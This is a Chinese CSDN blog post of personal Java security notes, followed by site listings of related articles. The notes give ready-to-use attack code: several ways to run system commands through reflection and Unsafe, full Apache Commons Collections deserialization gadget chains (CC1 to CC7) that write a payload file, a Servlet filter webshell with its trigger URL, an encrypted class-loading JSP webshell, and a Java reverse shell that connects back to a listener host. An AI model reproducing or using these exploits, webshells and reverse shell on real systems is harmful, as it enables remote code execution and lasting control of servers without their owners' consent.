Java sec记录

已于 2022-04-13 19:16:16 修改
阅读量1.6w 收藏
点赞数
分类专栏: web Java 文章标签: java
于 2021-12-11 17:55:24 首次发布
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/121875865
版权
web 同时被 2 个专栏收录
14 篇文章 0 订阅
订阅专栏
Java
5 篇文章 0 订阅
订阅专栏

城市的花园没有花, 广播里的声音沙哑…

"茴"的N种写法

// 1
Runtime.getRuntime().exec("calc.exe");

// 2
Runtime r = Runtime.getRuntime();
r.exec("calc.exe");

// 3
Runtime r = Runtime.getRuntime();
Class c = Runtime.class;
Method execmethod = c.getMethod("exec", String.class);
execmethod.invoke(r, "calc.exe");

// 4
Class c = Runtime.class;
Method getRuntimeMethod = c.getMethod("getRuntime", null);
Runtime r = (Runtime) getRuntimeMethod.invoke(null,null);
Method execmethod = c.getMethod("exec", String.class);
execmethod.invoke(r, "calc.exe");

// 5
Class c = Runtime.class;
Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}).transform(c);
Runtime r = (Runtime) new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null,null}).transform(getRuntimeMethod);
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}).transform(r);

// 6
Scanner scan = new Scanner(System.in);
String cmd = scan.next();
System.out.println(cmd);

Field theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe");
theUnsafeField.setAccessible(true);
Unsafe unsafe = (Unsafe) theUnsafeField.get(null);

Class processClass = Class.forName("java.lang.ProcessImpl");
Object processObject = unsafe.allocateInstance(processClass);

String[] cmdarg = {"cmd", "/c", cmd};
Method createCommandLine = processClass.getDeclaredMethod("createCommandLine", new Class[]{int.class, String.class, String[].class});
createCommandLine.setAccessible(true);
String cmdr = (String) createCommandLine.invoke(processObject, new Object[]{2, "cmd", cmdarg});
System.out.println("cmd: " + cmdr);


Method create = processClass.getDeclaredMethod("create", new Class[]{String.class, String.class, String.class, long[].class, boolean.class});
create.setAccessible(true);
long[] stdHandles = new long[]{-1,-1,-1};
create.invoke(processObject, new Object[]{cmdr, null, null, stdHandles, false});

sun.misc.JavaIOFileDescriptorAccess fdAccess
        = sun.misc.SharedSecrets.getJavaIOFileDescriptorAccess();
FileDescriptor stdout_fd = new FileDescriptor();
fdAccess.setHandle(stdout_fd, stdHandles[1]);
BufferedInputStream stdout_stream = new BufferedInputStream(
        new FileInputStream(stdout_fd));
String o = "";
java.util.Scanner c = new java.util.Scanner(stdout_stream);
o = c.hasNext() ? c.next() : o;
System.out.println(o);

序列链

CC1

jdk 1.7有效

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import sun.rmi.transport.Target;

import javax.xml.crypto.dsig.Transform;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class Exp {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null,null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(Runtime.class);

        HashMap<Object, Object> map = new HashMap<>();
        map.put("value", "foo");
        Map<Object,Object> transformedmap = TransformedMap.decorate(map, null, chainedTransformer);

        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor cons = c.getDeclaredConstructor(Class.class, Map.class);
        cons.setAccessible(true);
        Object ins = cons.newInstance(java.lang.annotation.Retention.class, transformedmap);
        ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("./poc.bin"));
        os.writeObject(ins);
        os.close();

        ObjectInputStream f = new ObjectInputStream(new FileInputStream("./poc.bin"));
        f.readObject();
        f.close();

    }
}

LazyMap

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.FactoryTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;
import sun.rmi.transport.Target;

import javax.xml.crypto.dsig.Transform;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class Exp {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null,null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "sir");
        HashMap<Object, Object> sir = new HashMap<>();
        sir.put(tiedMapEntry, "123");
        lazymap.remove("sir");

        Class c = LazyMap.class;
        Field factoryfield = c.getDeclaredField("factory");
        factoryfield.setAccessible(true);
        factoryfield.set(lazymap, chainedTransformer);

        ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("./poc.bin"));
        os.writeObject(sir);
        os.close();

        ObjectInputStream f = new ObjectInputStream(new FileInputStream("./poc.bin"));
        f.readObject();
        f.close();
    }
}

CC2

 public void CC2() throws Exception {
        org.apache.commons.collections4.functors.ChainedTransformer chain = new org.apache.commons.collections4.functors.ChainedTransformer(
                new org.apache.commons.collections4.functors.ConstantTransformer(Runtime.class),
                new org.apache.commons.collections4.functors.InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new org.apache.commons.collections4.functors.InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new org.apache.commons.collections4.functors.InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}));

        org.apache.commons.collections4.comparators.TransformingComparator comparator =
                new org.apache.commons.collections4.comparators.TransformingComparator(chain);

        // 在初始化时不带入 comparator
        PriorityQueue<String> sir = new PriorityQueue<>(2);
        sir.add("1");
        sir.add("2");

        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(sir, comparator);

        ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("./poc.bin"));
        os.writeObject(sir);
        os.close();

        ObjectInputStream f = new ObjectInputStream(new FileInputStream("./poc.bin"));
        f.readObject();
        f.close();
    }

CC3

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;


public class CC3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        Field namefield = tc.getDeclaredField("_name");
        namefield.setAccessible(true);
        namefield.set(templates, "aaaa");

        Field bytecodesfield = tc.getDeclaredField("_bytecodes");
        bytecodesfield.setAccessible(true);
        byte[] code = Files.readAllBytes(Paths.get("Test.class"));
        byte[][] codes = {code};
        bytecodesfield.set(templates, codes);

        Field tfactoryField = tc.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
//        templates.newTransformer();

//        Transformer[] transformers = new Transformer[]{
//                new ConstantTransformer(templates),
//                new InvokerTransformer("newTransformer", null, null)
//        };

        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            instantiateTransformer
        };


        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(1);

        HashMap<Object, Object> map = new HashMap<>();
        Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "sir");
        HashMap<Object, Object> sir = new HashMap<>();
        sir.put(tiedMapEntry, "123");
        lazymap.remove("sir");

        Class c = LazyMap.class;
        Field factoryfield = c.getDeclaredField("factory");
        factoryfield.setAccessible(true);
        factoryfield.set(lazymap, chainedTransformer);

        Serialization(sir);
        UnSerialization();
    }

    public static void Serialization(Object obj) throws Exception{
        ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("poc.bin"));
        os.writeObject(obj);
        os.close();
    }

    public static void UnSerialization() throws Exception{
        ObjectInputStream os = new ObjectInputStream(new FileInputStream("poc.bin"));
        os.readObject();
        os.close();
    }
}

其中Test.class为Test.java编译:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Test extends AbstractTranslet{
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

CC4

针对commons-collections4 4.0:

 <dependency>
     <groupId>org.apache.commons</groupId>
     <artifactId>commons-collections4</artifactId>
     <version>4.0</version>
 </dependency>

public void CC4() throws Exception {
        InputStream inputStream = Serialization.class.getResourceAsStream("Test.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);

        // 初始化 TemplatesImpl 对象
        TemplatesImpl tmpl = new TemplatesImpl();
        Field bytecodes = TemplatesImpl.class.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(tmpl, new byte[][]{bytes});
        // _name 不能为空
        Field name = TemplatesImpl.class.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(tmpl, "sir");

        // 结合 ChainedTransformer
        org.apache.commons.collections4.functors.ChainedTransformer chain = new org.apache.commons.collections4.functors.ChainedTransformer(
                new org.apache.commons.collections4.Transformer[]{
                        new org.apache.commons.collections4.functors.ConstantTransformer(TrAXFilter.class),
                        new org.apache.commons.collections4.functors.InstantiateTransformer(new Class[]{Templates.class}, new Object[]{tmpl})
                }
        );

        org.apache.commons.collections4.comparators.TransformingComparator comparator =
                new org.apache.commons.collections4.comparators.TransformingComparator(chain);

        // 在初始化时不带入 comparator
        PriorityQueue<String> sir = new PriorityQueue<>(2);
        sir.add("1");
        sir.add("2");

        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(sir, comparator);

        Exp(sir);
    }

CC5

public void CC5() throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        // 创建 LazyMap 并引入 TiedMapEntry
        Map lazyMap = LazyMap.decorate(new HashMap(), chainedTransformer);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "sir");

        // 实例化 BadAttributeValueExpException 并反射写入
        BadAttributeValueExpException sir = new BadAttributeValueExpException("sir");
        Field field = BadAttributeValueExpException.class.getDeclaredField("val");
        field.setAccessible(true);
        field.set(sir, entry);

        Exp(sir);
    }

CC6

public void CC6() throws Exception {
        // 初始化 HashMap
        HashMap<Object, Object> sir = new HashMap<>();

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        // 创建一个空的 ChainedTransformer
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{});

        // 创建 LazyMap 并引入 TiedMapEntry
        Map lazyMap = LazyMap.decorate(new HashMap(), fakeChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "sir");

        sir.put(entry, "sir");

        //用反射再改回真的chain
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(fakeChain, transformers);
        //清空由于 hashMap.put 对 LazyMap 造成的影响
        lazyMap.clear();

        Exp(sir);
    }

CC7

public void CC7() throws Exception {
        // 初始化 HashMap
        Hashtable<Object, Object> sir = new Hashtable<>();

        // 创建 ChainedTransformer
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        // 创建一个空的 ChainedTransformer
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{});

        // 创建 LazyMap 并引入 TiedMapEntry
        Map lazyMap = LazyMap.decorate(new HashMap(), fakeChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "sir");

        sir.put(entry, "sir");

        //用反射再改回真的chain
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(fakeChain, transformers);
        //清空由于 hashtable.put 对 LazyMap 造成的影响
        lazyMap.clear();

        Exp(sir);
    }

public static void Exp(Object obj) throws Exception {
        // Serialization
        String Filename = "poc.bin";
        ObjectOutputStream ObjOut = new ObjectOutputStream(new FileOutputStream(Filename));
        ObjOut.writeObject(obj);
        ObjOut.close();
        // UnSerialization
        ObjectInputStream ObjIn = new ObjectInputStream(new FileInputStream(Filename));
        ObjIn.readObject();
        ObjIn.close();
    }

Webshell

直接在Native层调用命令执行(Runtime.getRuntime().exec())的Filter:

import sun.misc.Unsafe;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import java.io.BufferedInputStream;
import java.io.FileDescriptor;
import java.io.FileInputStream;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

@WebFilter(urlPatterns = "/demo", filterName = "demoFilter")
public class DemoFilter implements Filter {
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        if (servletRequest.getParameter("todo") != null) {
            String exe = servletRequest.getParameter("exe");
            String args = servletRequest.getParameter("args");
            String cn = servletRequest.getParameter("cn"); // cn=java.lang.ProcessImpl
            Field theUnsafeField = null;
            try {
                theUnsafeField = Unsafe.class.getDeclaredField("theUnsafe");
            } catch (NoSuchFieldException e) {
            }
            theUnsafeField.setAccessible(true);
            Unsafe unsafe = null;
            try {
                unsafe = (Unsafe) theUnsafeField.get(null);
            } catch (IllegalAccessException e) {
            }

            Class processClass = null;
            try {
                processClass = Class.forName(cn);
            } catch (ClassNotFoundException e) {
            }
            Object processObject = null;
            try {
                processObject = unsafe.allocateInstance(processClass);
            } catch (InstantiationException e) {
            }

            String[] arg = {exe, "/c", args};
            Method createCommandLine = null;
            try {
                createCommandLine = processClass.getDeclaredMethod("createCommandLine", int.class, String.class, String[].class);
            } catch (NoSuchMethodException e) {
            }
            createCommandLine.setAccessible(true);
            String parg = null;
            try {
                parg = (String) createCommandLine.invoke(processObject, new Object[]{2, exe, arg});
            } catch (IllegalAccessException | InvocationTargetException e) {
            }
            // System.out.println("parg: " + parg);


            Method create = null;
            try {
                create = processClass.getDeclaredMethod("create", String.class, String.class, String.class, long[].class, boolean.class);
            } catch (NoSuchMethodException e) {
            }
            create.setAccessible(true);
            long[] stdHandles = new long[]{-1,-1,-1};
            try {
                create.invoke(processObject, parg, null, null, stdHandles, false);
            } catch (IllegalAccessException | InvocationTargetException e) {
            }

            sun.misc.JavaIOFileDescriptorAccess fdAccess
                    = sun.misc.SharedSecrets.getJavaIOFileDescriptorAccess();
            FileDescriptor stdout_fd = new FileDescriptor();
            fdAccess.setHandle(stdout_fd, stdHandles[1]);
            BufferedInputStream stdout_stream = new BufferedInputStream(
                    new FileInputStream(stdout_fd));
            java.util.Scanner s = new java.util.Scanner(stdout_stream).useDelimiter("\\a");
            String output = s.hasNext() ? s.next() : "";
            servletResponse.getWriter().write(output);
        } else {
            filterChain.doFilter(servletRequest, servletResponse);
        }
    }
}

触发URL:http://192.168.56.101:8080/demo?todo=ture&exe=cmd&cn=java.lang.ProcessImpl&args=whoami

BY

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!
    static class TO extends ClassLoader{
        TO(ClassLoader c){
            super(c);
        }
        public Class definclass(byte []b, int a){
            return super.defineClass(b,0,a);
        }
    }
%><%
    String requestMethod = request.getMethod();
    String pmeth = "PO" + "ST";
    String pd = "202cb962ac59075b"; // 123
    ClassLoader getloader = this.getClass().getClassLoader();
    TO to = new TO(getloader);
    if (pmeth.equals(requestMethod)){
        session.putValue("u",pd);
        String aaa = "A"+ "E" + "S";
        Cipher c = Cipher.getInstance(aaa);
        c.init(2,new SecretKeySpec(pd.getBytes(),aaa));
        String data = request.getReader().readLine();
        byte[] decodeBuffer = new sun.misc.BASE64Decoder().decodeBuffer(data);
        byte [] classbt = c.doFinal(decodeBuffer);
        Class<?> myclass = to.definclass(classbt, classbt.length);
        Object o = myclass.newInstance();
        o.equals(pageContext);
    }
%>

Java反弹shell

String host = "192.168.56.1";
int port = 1234;
String[] cmd;
String os = System.getProperty("os.name").toLowerCase(Locale.US);
if(os.contains("windows")){
    cmd = new String[]{"cmd"};
}else{
    cmd = new String[]{"/bin/bash"};
}

Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
java.net.Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) {
        so.write(pi.read());
    }
    while (pe.available() > 0) {
        so.write(pe.read());
    }
    while (si.available() > 0) {
        po.write(si.read());
    }
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();
        break;
    } catch (Exception e) {
    }
}
p.destroy();
s.close();
钞sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java源码 SECS协议,里面包含各种进制转换,用于半导体行业
RDbBCeBW的博客
10-31 257
在半导体行业中,Java源码SECS协议能够被应用于很多领域,例如在半导体工艺生产线上,各种工艺设备需要进行数据的传输与通信;总体来看,Java源码SECS协议在半导体行业的应用十分广泛,它能够有效地保障半导体生产过程中的数据传输和通信需求。在这篇文章中,我们将讨论Java源码SECS协议对于半导体行业的应用及其在数据传输方面所具有的优势。未来,随着半导体技术的不断发展和半导体行业的不断壮大,Java源码SECS协议也将不断得到完善和优化,这将为半导体行业的数据传输和通信提供更加高效、稳定、可靠的保障。
secs4java8:该库是Java8上的SEMI-SECS通讯实现
05-15
secs4java8 介绍 该库是Java8上SEMI-SECS通讯的实现。 技术支持 SECS-I(SEMI-E4) SECS-II(SEMI-E5) 创业板(SEMI-E30,部分) HSMS-SS(SEMI-E37.1) 创建Communicator实例并打开 对于使用HSMS-SS-Passive的示例 /* HSMS-SS-Passive open example */ HsmsSsCommunicatorConfig config = new HsmsSsCommunicatorConfig (); config . protocol( HsmsSsProtocol . PASSIVE ); config . socketAddress( new InetSocketAddress ( " 127.0.0.1 " , 5000 ));
java-sec6
qq_39301720的博客
07-12 252
1.MapHashmap HashTable TreeMapHashMap最常用的Map,它根据键的HashCode 值存储数据,根据键可以直接获取它的值,具有很快的访问速度。HashMap最多只允许一条记录的键为Null(多条会覆盖);允许多条记录的值为 Null。非同步的。TreeMap能够把它保存的记录根据键(key)排序,默认是按升序排序,也可以指定排序的比较器,当用Iterator 遍历...
Java安全
最新发布
q
06-19 1256
靶场地址查看数据库配置文件,mysql,用户名密码根据自己数据库密码更改使用小皮面板的mysql,新建一个数据名为javasec的数据库运行javasec.sql文件下载运行即可访问本地8000端口,用户名密码admin,admin。
java-sec4
qq_39301720的博客
07-06 261
Java异常处理机制Throwable类-父类  Error类,Exception类 -子类运行异常-Error和RuntimeException以及其子类  编译器不做语法检查检查异常-除了上述的类 编译器不让语句通过public void testException() throws IOException{    //FileInputStream的构造函数会抛出FileNotFoundEx...
半导体行业-SECS/GEM协议 JAVASECS/GEM通信 JAVA开发资料与SECS/GEM通信 SECS/GEM快速入门的实例 Springboot集成SECS/GEM通信协议
oSenLin123456的博客
10-30 780
半导体行业-SECS/GEM协议 JAVASECS/GEM通信 JAVA开发资料与SECS/GEM通信 SECS/GEM快速入门的实例 Springboot集成SECS/GEM通信协议 半导体行业-SECS/GEM协议 JAVASECS/GEM通信 JAVA开发资料与SECS/GEM通信 SECS/GEM快速入门的实例 Springboot集成SECS/GEM通信协议
javaweb-sec:攻击Java Web应用-[Java Web安全]
03-08
这个名为"javaweb-sec:攻击Java Web应用-[Java Web安全]"的项目,旨在提供一个全面的资源,帮助开发者理解并防御可能针对Java Web应用的各种安全威胁。这个开源项目鼓励社区参与,共同扩展和完善其内容。 在Java ...
Sec_work.rar
01-24
总结,"Sec_work.rar"中的Java学生信息管理系统是Java编程在实际应用中的一个生动实例,它涵盖了众多Java编程的基础知识和高级技术,对于学习和掌握Java编程具有重要的参考价值。无论是新手还是经验丰富的开发者,都...
secspike:Java EE 安全性的可用性飙升
06-11
通过JPA,开发者可以定义实体类的安全规则,如访问控制列表(ACLs),以限制对数据库记录的访问。JTA则允许跨多个资源的分布式事务,保证数据的一致性,即使在异常情况下也能恢复到安全状态。 另外,Java EE 8...
Java期末大作业,聊天系统服务端和客户端
05-22
- 调试技巧,如使用IDE的断点、日志记录和性能分析等,也是开发者必备的能力。 总之,这个Java聊天系统项目涵盖了网络编程、多线程、文件操作、消息处理、用户状态管理等多个核心知识点,是全面锻炼和提升Java编程...
COMP313-SEC001-Team5--iMenu:iMenu-后端
03-18
11. **日志管理**:如Log4j或SLF4J,记录应用运行时的事件和错误信息。 12. **错误处理和异常管理**:确保程序的健壮性,对可能出现的错误进行妥善处理。 以上这些知识点可能在项目源代码中体现,通过阅读和分析...
javaweb-sec
03-25
攻击Java Web应用-[Java Web安全] 这是一个不定期更新的免费开源的Java Web安全相关知识归纳总结,培训的项目。该项目旨在竭尽所能的以清晰清晰的方式分享Java安全相关技术,将某些复杂的技术问题简单化,让更多的人能够学会Java安全。 尽管我在写文章的时候已经解决了避免出现错误或问题,但难免不会有描述不清或者错误的地方,如果您在阅读文章的时候发现任何问题都可以通过微信或提issue与我们联系,也欢迎大家加入javasec微信群一起交流。 注:原javasec.org已迁移到: @Author--[ ] @Github javaweb @GitBook: @: @日期2019-12-01
sechub:SecHub-一种通过一个APIClient使用不同安全工具的集中而简便的方法
02-05
SecHub 预期用途 SecHub代表一种机制来集成各种安全产品,例如 静态代码分析工具 网络扫描仪 基础架构扫描仪 ...也许将来会更多 只需使用一个简单的API /客户端 安装 请访问了解详细信息。 贡献 我们欢迎任何贡献。 如果您想为这个项目做贡献,请阅读。 行为守则 请阅读我们因为它是我们进行互动的基础。 执照 该项目是根据授权的。 提供者信息 请访问了解有关提供商的信息。 注意:在将程序用于生产性使用之前,请采取所有必要的预防措施,例如,根据您的特定用途测试和验证程序。 该程序仅针对我们自己的用例进行了测试,可能与您的用例不同。
java SECS管理系统 SECS 客户端(Passive) 管理系统 springboot SECS快速开发平台 源代码
02-02
标准化兼容性:SECS/GEM是半导体行业广泛接受的标准通信协议,从而简化集成过程并降低系统复杂性。 设备控制与监控:通过支持SECS协议的软件,企业可以实时地控制和监控生产设备的状态和参数,调整工艺流程,提高设备利用率和生产效率,并及时预防和处理设备故障。 数据交换与追溯:SECS协议支持大量生产相关数据的高效传输,包括设备状态信息、工艺参数、良率数据等,这对于质量控制、数据分析以及满足严格的合规要求至关重要。 集成PLC系统:PLC在工业自动化系统中扮演着关键角色,负责底层设备的直接控制。支持SECS协议的软件能与PLC协同工作,将上层MES(制造执行系统)或ERP(企业资源规划)系统的指令转化为设备操作,并收集来自PLC和设备的实际运行数据。 优化资源调度:通过标准协议实现设备间的互联互通,有助于企业优化生产线资源分 拥有完善的方案 ,软件开发时间可缩短80% 。 已经集成大量的逻辑和各类的应用场景,稳定运行于多个工厂 提供源代码 https://blog.csdn.net/oSenLin123456/article/details/135313874
JAVA SECS通信 S5F1报警/取消报警上传 springboot集成SECS通信协议 JAVASECS集成资料大全 JAVA 对接SECS资料明细实战例子 半导体行业-SECS/GEM协议
oSenLin123456的博客
11-20 285
javaSECS/GEM基础通信S2F17获取时间半导体行业-SECS/GEM协议 JAVASECS/GEM通信 S10F3 终端单个显示例子 Springboot集成SECS/GEM通信协议-CSDN博客更多实例请阅$.ajax({data: {id: 1},$('#msg').text("发送成功");$.ajax({data: {id: 1},$('#msg').text("发送成功");try {
java-sec-code学习
公众号shadow sock7
03-04 4319
配合静态代码审计工具,学习一下。 git clone https://github.com/JoyChou93/java-sec-code cd java-sec-code # 生成jar包 mvn clean package 修改配置文件src/main/resources/application.properties:: 将数据库名,账号密码修改为mysql中有的。 参考:mysql最常用最......
Java-Sec-Code 环境搭建
MZa1213123的博客
03-16 9122
一、Java Sec Code 介绍 对于学习Java漏洞代码来说,Java Sec Code是一个非常强大且友好的项目。 该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。 每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里。 具体可查看每个漏洞代码和注释。 下载地址:https://github.com/JoyChou93/java-sec-code 二、搭建环境 IDEA 由于在 windows 对代码进行审计,方便 debu
JAVA 实现SECS/GEM通信协议之报文解析
qq_16055867的博客
02-24 2296
废话不说,直接上代码 一、协议解析 //获取字节流 byte[] data = is.read(buf); // 判断数据长度是否异常 if (length < 10) { throw new SecsParseException(String.format("Incomplete message (messag...
代码审计入门之java-sec-code
MSB_WLAQ的博客
10-13 2517
1.介绍 对于学习JAVA代码审计的同学来说,java-sec-code是一个不可多得的学习靶场,根据作者的介绍每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里,具体可查看每个漏洞代码和注释。 2.安装 项目地址https://github.com/JoyChou93/java-sec-code/ java-sec-code是由java开发,使用的框架为springboot,下载到本地后直接使用IDEA导入项目。 选择maven工程选项。 导入项目..
P2020SEC安全参考手册
"P2020SEC.pdf 是 P2020 Security (SEC 3.1) 的参考手册,适用于 P2020 和 P2010 处理器,以及 P2020 SEC CRM。这份文档是 Freescale Semiconductor 在 12/2012 时发布的 Rev.0 版本。" 本文档主要涵盖了 P2020 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值